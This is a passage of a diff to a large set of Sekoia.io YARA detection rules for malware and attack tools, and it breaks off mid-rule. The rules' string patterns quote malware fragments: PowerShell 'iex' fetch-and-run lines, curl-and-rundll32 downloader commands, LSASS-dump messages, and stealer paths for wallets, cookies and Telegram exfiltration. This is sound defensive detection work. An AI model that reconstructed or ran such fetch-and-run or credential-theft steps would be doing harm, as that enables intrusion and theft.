+		$ = "Welcome to EDR/AV Killer using truesight driver!" wide
+		$ = "This is a PoC, use it at your own risk!" wide
+		$ = "[-] Failed to set CTRL+C handler. Exiting..." wide
+		$ = "ntdll.dll" wide
+		$ = "\\\\.\\TrueSight" wide
+		$ = "[-] CreateFileA failed" wide
+		$ = " not running" wide
+		$ = "[-] Process name: " wide
+		$ = "[+] Terminating PID: " wide
+		$ = "[-] DevicesIoControl failed" wide
+		$ = "[!] Stoping and Deleting trueSight Service!" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 300KB and 5 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and filesize > 20KB and 20 of them
 }
-rule SEKOIA_Loader_Win_Squirrelwaffle_Doc : FILE
+rule SEKOIA_Tool_Lsass_Dump_Strings : FILE
 {
 	meta:
-		description = "Detect the Squirrelwaffle malicious document (not xls)"
+		description = "Detects Lsass dump based on strings"
 		author = "Sekoia.io"
-		id = "caadeac3-d4c7-4d84-b539-c03cc4c6c274"
-		date = "2021-09-20"
+		id = "bf024dc6-a1c8-4c3f-9bf8-8d246c129639"
+		date = "2024-09-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_squirrelwaffle_doc.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_lsass_dump_strings.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "b9f7c3605e25c8c7caa5f70e492d46fb70e7cb6002704440e7346ebfb2bbc7bf"
+		hash = "f4540f42902c068b9290239729c45324"
+		logic_hash = "7dfee9368297b3fd6c7f247a65b5344da0f5438c2145c5d53af48983d0d9a745"
 		score = 75
-		quality = 76
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = {4f4b31203d2022636d64202f632072756e646c6c33322e65786520433a5c50726f6772616d446174615c777777312e646c6c2c6c647222}
-		$s2 = {4145524f2042495a20434f4d20434f4f502045445520474f5620494e464f20494e54204d494c204d555345554d204e414d45204e4554204f52472050524f}
+		$ = "[SUCCESS] Successfully dumped core LSASS information for PID:"
+		$ = "[SUCCESS] All data dumped to "
+		$ = "[ERROR] Unable to dump process"
 
 	condition:
-		any of them and filesize > 100KB
+		uint16be( 0 ) == 0x4d5a and 3 of them
 }
-rule SEKOIA_Rat_Win_Konni_Rat : FILE
+rule SEKOIA_Malware_Valleyrat_Downloader_Strings : FILE
 {
 	meta:
-		description = "Detect the KONNI RAT DLL files (x32 and x64)"
+		description = "Detects ValleyRat downloader"
 		author = "Sekoia.io"
-		id = "032f1c79-6f03-4588-a4af-38b1f3ca1cb8"
-		date = "2023-09-26"
+		id = "12985f34-f894-402b-80d1-5d6b2486d730"
+		date = "2024-06-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_konni_rat.yar#L1-L25"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/malware_valleyrat_downloader_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "764e75d3e433a8784e826f436896c50c9622129412ff277b55ec9aaf1402ff5e"
+		logic_hash = "321683ac5bdec626cf140cb50507fb03aea2a32635eb6cec884a3fa43c1a9d91"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244331,31 +244166,27 @@ rule SEKOIA_Rat_Win_Konni_Rat : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = ".cab" wide
-		$ = ".zip" wide
-		$ = ".rar" wide
-		$ = ".ini" wide
-		$ = ".dat" wide
-		$ = "%s(%d)" wide
-		$ = "%s %s \"%s\"" wide
-		$ = "\\Temp\\" wide
+		$ = { 43 00 3a 00 5c [0-30]
+        5c 00 4e 00 54 00 55
+        00 53 00 45 00 52 00
+        2e 00 44 00 58 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them and filesize > 60KB and filesize < 120KB
+		uint16be( 0 ) == 0x4d5a and filesize < 2MB and all of them
 }
-
-rule SEKOIA_Wiper_Win_Ruransom : FILE
+rule SEKOIA_Tool_Soaphound_Strings : FILE
 {
 	meta:
-		description = "Detect the RURansom malware"
+		description = "Detects SOAPHound based on strings"
 		author = "Sekoia.io"
-		id = "7bf3694b-c689-482f-88cd-b1f3b86bbc36"
-		date = "2022-11-21"
+		id = "adf48506-f07d-445a-83cc-0aed3b6b55eb"
+		date = "2024-11-12"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/wiper_win_ruransom.yar#L4-L26"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_soaphound_strings.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "e16cfe7a273bfa01e2ae56174e6ea10a84d42542a62dda5e7b095a0c30082a31"
+		hash = "b2a953590d75213388473fb51e6b5f2f"
+		logic_hash = "14ff92230d0999a39a6e1042f5c42b5ae275d90ece3d74727e5da44c569a93eb"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244363,25 +244194,26 @@ rule SEKOIA_Wiper_Win_Ruransom : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "RURansom"
-		$ = "AesCrypter"
-		$ = "RURansom" wide
+		$ = "Output files generated in" wide
+		$ = "(&(cn=*)(!(cn=a*))(!(cn=b*))" wide
+		$ = "unicodePassword" wide
+		$ = "net.tcp://localhost:9389/ActiveDirectoryWebServices/" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "e4b6b5b2b293d497ddf373ca9f7e97458328703d2769f451890ac48771c85070" )
+		uint16be( 0 ) == 0x4d5a and filesize < 2MB and all of them
 }
-rule SEKOIA_Infostealer_Win_Nekostealer : FILE
+rule SEKOIA_Infostealer_Win_Banditstealer : FILE
 {
 	meta:
-		description = "Detect the NekoStealer infostealer based on specific strings"
+		description = "Finds BanditStealer samples based on specific strings"
 		author = "Sekoia.io"
-		id = "8b7d2708-9d33-4855-8e02-f6afedb7dda8"
-		date = "2023-01-24"
+		id = "d1e45a5c-c06d-4161-8d30-fa94bcf0ea7a"
+		date = "2023-07-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_nekostealer.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_banditstealer.yar#L1-L35"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "f027775bebb48ceb128392040ec2ac8ad84f2a2009760c040e4d376c2f06b663"
+		logic_hash = "64d4860dd8a783be10541dd5c939dcd2a2b08309a7cd17b9dbbda1ba8b26485d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244389,27 +244221,42 @@ rule SEKOIA_Infostealer_Win_Nekostealer : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$nek = "NekoStealer.Stealing" ascii
-		$str01 = "\\Local Storage\\leveldb" wide
-		$str02 = "======================= Discord Tokens =======================" wide
-		$str03 = "======================== IP Information ========================" wide
-		$str04 = "https://ipapi.co/" wide
+		$spe01 = "Banditstealer" ascii
+		$spe02 = "BANDIT STEALER" ascii
+		$spe03 = "Location: Geolocation: " ascii
+		$spe04 = "awesomeProject2/core.GetWallets" ascii
+		$spe05 = "awesomeProject2/core.GetCreditCards" ascii
+		$spe06 = "awesomeProject2/core.GetCookies" ascii
+		$spe07 = "awesomeProject2/core.KillProcessByName" ascii
+		$spe08 = "main.sendZipToTelegram" ascii
+		$str01 = "json:\"city\"" ascii
+		$str02 = "UAC disabled" ascii
+		$str03 = "\\OpenVPN Connect\\profiles\\" ascii
+		$str04 = "\\Documents\\Monero\\wallets\\" ascii
+		$str05 = "cookies.sqlite" ascii
+		$str06 = "creditcard.txt" ascii
+		$str07 = "vmware.exe" ascii
+		$str08 = "aeachknmefphepccionboohckonoeemg" ascii
+		$str09 = "\\Documents\\NetSarang\\Xftp\\Sessions\\" ascii
+		$str10 = "\\WhatsApp\\Local Storage\\leveldb\\" ascii
+		$str11 = "Visited Time: %s" ascii
+		$str12 = "\\Google\\Chrome\\User Data\\Telegram Desktop\\tdata\\" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( #nek > 10 or all of ( $str* ) )
+		uint16( 0 ) == 0x5a4d and 2 of ( $spe* ) and 6 of ( $str* )
 }
-rule SEKOIA_Exploit_Linux_Eop_Ubuntu_Overlayfs_Local_Privesc_Strings : FILE
+rule SEKOIA_Apt_Gamaredon_Ddrdoh_Powershell_Backdoor : FILE
 {
 	meta:
-		description = "Detects Ubuntu OverlayFS Local Privesc exploit"
+		description = "Detects GAMAREDON's DDRDOH PowerShell Backdoor"
 		author = "Sekoia.io"
-		id = "5e0e73f5-4cb3-4a79-adac-578b17ed7660"
-		date = "2023-12-08"
+		id = "3413dedd-e3ec-4231-8af7-c7f709ab82d7"
+		date = "2023-01-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/exploit_linux_eop_ubuntu_overlayfs_local_privesc_strings.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_ddrdoh_powershell_backdoor.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "48ff9d2a10eef1e9b9088ba4a53aa77f43324e5d51da65b65a5829276067f011"
+		logic_hash = "32d088affb65d410b2715fde28227792ea9f406e324de4a2e204e9850f0b81ce"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244417,56 +244264,55 @@ rule SEKOIA_Exploit_Linux_Eop_Ubuntu_Overlayfs_Local_Privesc_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "./ovlcap"
-		$ = "rm -rf '%s/'"
-		$ = "./ovlcap/work"
-		$ = "./ovlcap/lower"
-		$ = "./ovlcap/upper"
-		$ = "./ovlcap/merge"
+		$ = "hidden iex $env:" ascii wide
+		$ = ".substring(0,4) -eq \"http" ascii wide
+		$ = ".split('!')[1];" ascii wide
+		$ = " -bxor $key[$i % $key.Length]" ascii wide
+		$s = "Filter $fil | Select-Object VolumeSerialNumber" ascii wide
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
+		uint8( 0 ) == 0x24 and 4 of them and filesize < 10KB
 }
-rule SEKOIA_Apt_Gelsemium_Firewood_Backdoor : FILE
+rule SEKOIA_Downloader_Win_Curl_Agent
 {
 	meta:
-		description = "Detects Gelsemium's FireWood backdoor"
+		description = "Detect the downloader used by Bluenoroff to install it CurlAgent"
 		author = "Sekoia.io"
-		id = "93670c07-9edd-4ea2-b8ed-6fee625491f4"
-		date = "2024-11-22"
+		id = "ddeb2d8f-1b10-4a33-b768-d19412e8551a"
+		date = "2023-05-02"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gelsemium_firewood_backdoor.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/downloader_win_curl_agent.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "2251bc7910fe46fd0baf8bc05599bdcf"
-		logic_hash = "dea8c7cfb35b3cc026a0df844e118b495e3ad0a85f55e2fd3b63a41dde2ea944"
+		logic_hash = "b34375ec051c969adec82901c1130b0a389261912559d70c652ee826cb2d4107"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "root dir:%s"
-		$ = "df -h|grep 'dev' |grep -v none|awk '/dev/{print $6}'"
-		$ = "rm -rf ../lib/%s"
-		$ = "Total Disk space:%luG, Free Disk spae:%luG"
+		$ = "%s\\marcoor.dll" wide
+		$ = "curl -A cur1-agent -L %s -s -d dl"
+		$ = "curl -A cur1-agent -L %s -s -d da"
+		$ = "cmd /c timeout /t 10 & rundll32 \"%s\" #1" wide
+		$ = "cmd /c timeout /t 10 & Del /f /q \"%s\" & attrib -s -h \"%s\" & rundll32 \"%s\" #1" wide
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
+		3 of them
 }
-rule SEKOIA_Hacktool_Ligolo_Strings : FILE
+rule SEKOIA_Rat_Win_Borat : FILE
 {
 	meta:
-		description = "Detects ligolo based on strings"
+		description = "Detect the Borat RAT besed on specific strings"
 		author = "Sekoia.io"
-		id = "5013256b-eda3-417e-ac72-959055b01c7e"
-		date = "2022-02-08"
+		id = "9f8badb3-ee8b-45d9-8515-c847351bb1f5"
+		date = "2022-04-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_ligolo_strings.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_borat.yar#L1-L25"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "12609bed61ef4d86737bc652a75c74f01e4a251466129ff56da0d7e002566d50"
+		logic_hash = "53d6d9fe6b3218d97079e624379863d927d0b783b24acbda359b18daafb5162e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244474,125 +244320,119 @@ rule SEKOIA_Hacktool_Ligolo_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Restarting Ligolo..."
-		$ = "Ligolo starts a socks5 proxy server"
-		$ = "main.startSocksProxy"
-		$ = "main.handleRelay"
-		$ = "main.StartLigolo"
+		$str0 = "BoratRatMutex_Sa8XOfH1BudX" ascii
+		$str1 = "BoratRat.exe" ascii
+		$str2 = "BoratRat" ascii
+		$str3 = "CN=BoratRat" wide
+		$str4 = "Sending plugun to " wide
+		$str5 = "Save recorded file fail " wide
+		$str6 = "Sa8XOfH1BudX" wide
+		$str7 = "Alert when process activive." wide
+		$str8 = "disableDefedner" wide
+		$str9 = "bin\\Ransomware.dll" wide
+		$str10 = "disableDefedner" wide
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize > 2MB and filesize < 5MB and 3 of them
+		uint16( 0 ) == 0x5A4D and 7 of them
 }
-rule SEKOIA_Apt_Gamaredon_Ddrdoh_Vbs_Downloader_Vbs : FILE
+
+rule SEKOIA_Apt_Sofacy_Graphitemalware_Generic : FILE
 {
 	meta:
-		description = "Detects malicious VBScript executed by LNK/mshta"
+		description = "Detects APT28 graphite malware based on strings"
 		author = "Sekoia.io"
-		id = "cc29d5d9-58bd-4f68-8673-daa41abfc7be"
-		date = "2023-01-24"
+		id = "6b51cfa3-4a7d-4c2a-9fd9-f129b8a18466"
+		date = "2022-09-27"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_ddrdoh_vbs_downloader_vbs.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_sofacy_graphitemalware_generic.yar#L3-L25"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "c91e1ce26c0735e8c68fe39f2fbeda8aed51cd4f9a0b967b5d184843728dcef4"
+		logic_hash = "f4c994c36768bae6d6e3b5aeefb634e485ab7b483a693781f29d5ff44c71996f"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "b24gZXJyb3IgcmVzd" ascii
-		$ = "BinaryStream.readtext" ascii nocase
-		$ = "createobject(\"msxml2.domdocument.3.0\").createelement(" ascii nocase
-		$ = "Dim cSecond, cMinute, CHour, cDay, cMonth, cYear" ascii nocase
-		$ = "tDate & \"T\" & tTime"
-		$ = "AutoOpen" ascii nocase
+		$ = "Microsoft Enhanced RSA and AES Cryptographic Provider" wide
+		$ = "Microsoft Enhanced RSA and AES Cryptographic Provider (Prototype)" wide
+		$ = "%s %04d sp%1d.%1d %s"
+		$ = "%s%c%s%c%s"
+		$ = "InternetReadFile"
+		$ = "ObtainUserAgentString"
+		$ = "CryptImportKey"
 
 	condition:
-		5 of them and filesize < 50KB
+		uint16be( 0 ) == 0x4d5a and filesize < 100KB and ( all of them or pe.imphash ( ) == "c56c322548250651361aef7dacf93eaf" )
 }
-rule SEKOIA_Apt_Cloudatlas_Init_Module_Virtualalloc : FILE
+rule SEKOIA_Tool_Tacticalrmm_Installer_Strings : FILE
 {
 	meta:
-		description = "Find init module of CloudAtlas with params passed to VirtualAlloc"
+		description = "Detects TacticalRMM installer"
 		author = "Sekoia.io"
-		id = "299ed681-9d1f-4b47-8389-ff5a608f49d4"
-		date = "2023-09-19"
+		id = "c4a0ba33-b458-4c2a-abfa-4c33481d6491"
+		date = "2024-05-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_cloudatlas_init_module_virtualalloc.yar#L1-L25"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_tacticalrmm_installer_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "31ffaeccc0b8fe36eea3b3a8200eff6a420b1a3937fd439dc84121654fcea502"
+		logic_hash = "0f8d66eb1c9c6ed9571a1dd7de05072aec6d3cda874618889d4fd51e5965bb26"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "02a1a9582f5ccf421b08c41c35049416b9cdefc9228daf6b38d95e9b0930cc5a"
-		hash2 = "c7f19c7c295c86867ea7fa4597ba0cebe12f751753866e7298fd5d84676facc3"
 
 	strings:
-		$chunk_1 = {
-        6A 40
-        68 00 30 10 00
-        8B 8D ?? ?? ?? ??
-        8B 51 50
-        52
-        6A 00
-        FF 15 ?? ?? ?? ??
-        }
+		$ = "TacticalRMMInstaller" ascii
+		$ = "tacticalagent-" ascii
+		$ = "tactical/go" ascii
+		$ = "tacticalrmm." ascii
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and $chunk_1 and filesize < 3MB
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize > 3MB and filesize < 8MB and 3 of them
 }
-rule SEKOIA_Apt_Globalshadow : FILE
+rule SEKOIA_Tool_Rathole_Strings : FILE
 {
 	meta:
-		description = "Detects the GLOBALSHADOW malware"
+		description = "Detects RATHole based on strings"
 		author = "Sekoia.io"
-		id = "2fef6192-25a6-4d6a-8e19-53ad51617d90"
-		date = "2024-09-04"
+		id = "39d11285-a3bf-46c3-901d-ab46601a9066"
+		date = "2024-05-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_globalshadow.yar#L1-L28"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_rathole_strings.yar#L1-L25"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "68c16b6f178c88c12c9555169887c321"
-		logic_hash = "034a994be5d5b00fc7d1a43a0cb0b5b576358cea26f3354fd574132560ca0ae3"
+		logic_hash = "f7c42328a38b2c101ea2d179b6adf9cf3d842d9e1c91e85fc6e684ee4f82458f"
 		score = 75
-		quality = 30
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$command1 = "time to rest" wide
-		$command2 = "pw" wide
-		$command3 = "pr" wide
-		$command4 = "dnld" wide
-		$step1 = "step1-" wide
-		$step2 = "step2-" wide
-		$step3 = "step3-" wide
-		$step4 = "step4-" wide
-		$step5 = "step5-" wide
-		$step6 = "step6-" wide
-		$delim = "]#@#[" wide
+		$ = "rathole\\src\\" ascii
+		$ = "\\\\?\\\\\\?\\UNC\\" wide
+		$ = "rathole::" ascii
+		$ = "src/server.rs"
+		$ = "`[server]` or `[client]"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 2 of ( $command* ) and 3 of ( $step* ) and $delim and true
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0xfeedface or uint32be( 0 ) == 0xfeedfacf or uint32be( 0 ) == 0xcafebabe or uint32be( 0 ) == 0xCFFAEDFE ) and 3 of them
 }
-rule SEKOIA_Apt_Ta410_Flowcloud_Rtti : FILE
+rule SEKOIA_Apt_Suspected_Sandworm_Sdelete_Wiper : FILE
 {
 	meta:
-		description = "Detects FlowCloud via RTTI"
+		description = "Detects Sdelete wiper"
 		author = "Sekoia.io"
-		id = "c6a18c08-8b98-46d7-a6c3-dc171c7791ac"
-		date = "2022-10-11"
+		id = "c1419b11-33e5-4280-b92a-039719cb17d3"
+		date = "2023-10-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_ta410_flowcloud_rtti.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_suspected_sandworm_sdelete_wiper.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "97f052c409c9b5de025d34180979cd4c322e67bab9f894d3b56c928340a6859b"
+		logic_hash = "094b946b89cfb475b8692f88af73fa8768a933139e0df9d6e7d7aa8614d3ab14"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244600,25 +244440,25 @@ rule SEKOIA_Apt_Ta410_Flowcloud_Rtti : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$RTTI_1 = ".?AVdllloader@@" ascii fullword
-		$RTTI_2 = ".?AVel_cryptowrapper@@" ascii fullword
-		$RTTI_3 = ".?AVAntiVirusCheck@@" ascii fullword
+		$s1 = ".exe -accepteula -r -s -q" wide
+		$s2 = "sdelete [-p passes] [-r]" wide
+		$s3 = "!This program cannot be run in DOS mode."
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 10MB and all of them
+		uint16be( 0 ) == 0x4d5a and $s1 and $s2 and #s3 == 2 and filesize < 500KB
 }
-rule SEKOIA_Apt_Emissarypanda_Web_Auto_Attack_Tool : FILE
+rule SEKOIA_Apt_Kimsuky_Malicious_Vba : FILE
 {
 	meta:
-		description = "Detect LuckyMouse's Web auto attack tool"
+		description = "Detects malicious VBA used by Kimsuky"
 		author = "Sekoia.io"
-		id = "c93eb792-a443-4c9a-8fcb-6015cc69f9b3"
-		date = "2022-08-03"
+		id = "2dbe2431-3592-4395-8164-49abae4a5a3d"
+		date = "2022-08-30"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_emissarypanda_web_auto_attack_tool.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_malicious_vba.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "bc55758367ba0a6b5cf963bcb51b7770b2c7b1cf43b0b79e663b4110f6a7bba8"
+		logic_hash = "68d7b757f660907fcea3ea03c4027b429f8acdef6569d63cdb744e9d77637080"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244626,29 +244466,25 @@ rule SEKOIA_Apt_Emissarypanda_Web_Auto_Attack_Tool : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[192.168.1.1/24|192.168.1.1|192.168.1|@host.txt]" ascii
-		$ = "80,s443,8080,s8443,8000-8010" ascii
-		$ = "exploit When find module vul" ascii
-		$ = "<title>\\s*(.*?)\\s*</title>" ascii
-		$ = "<meta.+?charset=[^\\w]?([-\\w]+)" ascii
-		$ = "%s is not existed" ascii
-		$ = "%-15s %4d Open" wide
+		$ = "Certutil -decode %TMP%"
+		$ = "%LOCALAPPDATA%\\Microsoft\\Office"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 4 of them and filesize < 500KB
+		uint32be( 0 ) == 0xD0CF11E0 and filesize < 1MB and all of them
 }
-rule SEKOIA_Tool_Exploit_Rottenpotato_Strings : FILE
+rule SEKOIA_Apt_Gamaredon_Lnk_Spreader : FILE
 {
 	meta:
-		description = "Detects RottenPotato compiled binaries"
+		description = "Detects LNK generated by Gamaredon LNK spreader"
 		author = "Sekoia.io"
-		id = "453646d4-b128-40ea-8840-4c53b8f1e486"
-		date = "2022-09-09"
+		id = "2866ca1d-c094-49ba-b1de-ff9a60680e28"
+		date = "2023-06-19"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_exploit_rottenpotato_strings.yar#L1-L27"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_lnk_spreader.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "c634fcced6889caf895ddf57bab5564fb2b0a4c83f1d6ba4dae655f2e5d935db"
+		hash = "7d6264ce74e298c6d58803f9ebdb4a40b4ce909d02fd62f54a1f8d682d73519a"
+		logic_hash = "e8a82fd4cdce7bc888184ccf8d182ab5bb53e30de04b02b7c63379bae5d21b1f"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244656,33 +244492,24 @@ rule SEKOIA_Tool_Exploit_Rottenpotato_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "WSAStartup failed with error: %d"
-		$ = "getaddrinfo failed with error: %d"
-		$ = "RPC -> send failed with error: %d"
-		$ = "RPC-> Connection closed"
-		$ = "COM -> bytes sent: %d"
-		$ = "COM -> recv failed with error: %d"
-		$ = "Running %S with args %S"
-		$ = "[-] Failed to create proc: %d"
-		$ = "Waiting for auth..."
-		$ = "Auth result: %d"
-		$ = "SeImpersonatePrivilege" wide
+		$ = "windoWSTYLE hiDdEn -NOlOgo iEX" wide nocase
+		$ = "(IeX (geT-coNtEnT" wide nocase
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 8 of them
+		uint32be( 0 ) == 0x4C000000 and filesize < 3KB and all of them
 }
-rule SEKOIA_Apt_Muddywater_Powgoop_Decode_Loop : FILE
+rule SEKOIA_Infostealer_Win_Daolpu_Str : FILE
 {
 	meta:
-		description = "Detects the loop used in PowGoop and its loader"
+		description = "Finds Daolpu Stealer samples based on specific strings."
 		author = "Sekoia.io"
-		id = "644ed1c4-e0e1-496e-9efc-7d9e15565f7b"
-		date = "2022-01-13"
+		id = "dde1cf12-48d8-45b6-b453-b7196e6b1271"
+		date = "2024-07-23"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_muddywater_powgoop_decode_loop.yar#L1-L19"
